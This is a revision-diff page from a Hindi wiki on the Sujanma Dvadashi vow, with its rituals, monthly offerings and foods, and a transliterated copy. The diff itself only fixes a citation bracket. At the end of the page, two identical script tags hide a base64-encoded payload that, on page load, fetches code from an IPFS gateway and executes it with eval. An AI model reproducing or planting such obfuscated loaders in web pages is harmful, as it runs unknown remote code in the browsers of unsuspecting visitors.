Difference between revisions of "सुजन्म द्वादशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - ")</ref" to "</ref")
 
Line 5: Line 5:
 
*प्रति [[मास]] क्रम से घी, चावल, जौ, सोना, पकाये गये जौ, जल, पकाये अन्न, छत्र, पायस, गन्ने का रस, चन्दन एवं वस्त्र का दान करना चाहिए।  
 
*प्रति [[मास]] क्रम से घी, चावल, जौ, सोना, पकाये गये जौ, जल, पकाये अन्न, छत्र, पायस, गन्ने का रस, चन्दन एवं वस्त्र का दान करना चाहिए।  
 
*क्रम से गोमूत्र, जल, घी, हरी तरकारियाँ, दूर्वा, चावल, जौ, तिल, सूर्य की किरणों से गर्म किया गया जल, दर्भयुक्त जल, दूध को ग्रहण करना चाहिए।
 
*क्रम से गोमूत्र, जल, घी, हरी तरकारियाँ, दूर्वा, चावल, जौ, तिल, सूर्य की किरणों से गर्म किया गया जल, दर्भयुक्त जल, दूध को ग्रहण करना चाहिए।
*रोग मुक्त, मेधावी, प्रसन्न हो जाता है तथा उस कुल में पुन: उत्पन्न होता है जहाँ धन, अन्न आदि का प्राचुर्य होता है और चिन्ता नहीं व्यापती है।<ref>हेमाद्रि (व्रतखण्ड 1, 1174-75, विष्णुधर्मोत्तरपुराण से उद्धरण)</ref>
+
*रोग मुक्त, मेधावी, प्रसन्न हो जाता है तथा उस कुल में पुन: उत्पन्न होता है जहाँ धन, अन्न आदि का प्राचुर्य होता है और चिन्ता नहीं व्यापती है।<ref>हेमाद्रि (व्रतखण्ड 1, 1174-75, विष्णुधर्मोत्तरपुराण से उद्धरण</ref>
 
 
 
 
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}

Latest revision as of 13:02, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • paush shukl paksh ki dvadashi par karana chahie, jabaki yah jyeshtha nakshatr par p dati hai tithivrat karana chahie.
  • devata vishnu ka vrat hai.
  • upavas ke sath ek varsh tak prati mas vishnu pooja karani chahie.
  • prati mas kram se ghi, chaval, jau, sona, pakaye gaye jau, jal, pakaye ann, chhatr, payas, ganne ka ras, chandan evan vastr ka dan karana chahie.
  • kram se gomootr, jal, ghi, hari tarakariyaan, doorva, chaval, jau, til, soory ki kiranoan se garm kiya gaya jal, darbhayukt jal, doodh ko grahan karana chahie.
  • rog mukt, medhavi, prasann ho jata hai tatha us kul mean pun: utpann hota hai jahaan dhan, ann adi ka prachury hota hai aur chinta nahian vyapati hai.[1]

 

tika tippani aur sandarbh

  1. hemadri (vratakhand 1, 1174-75, vishnudharmottarapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>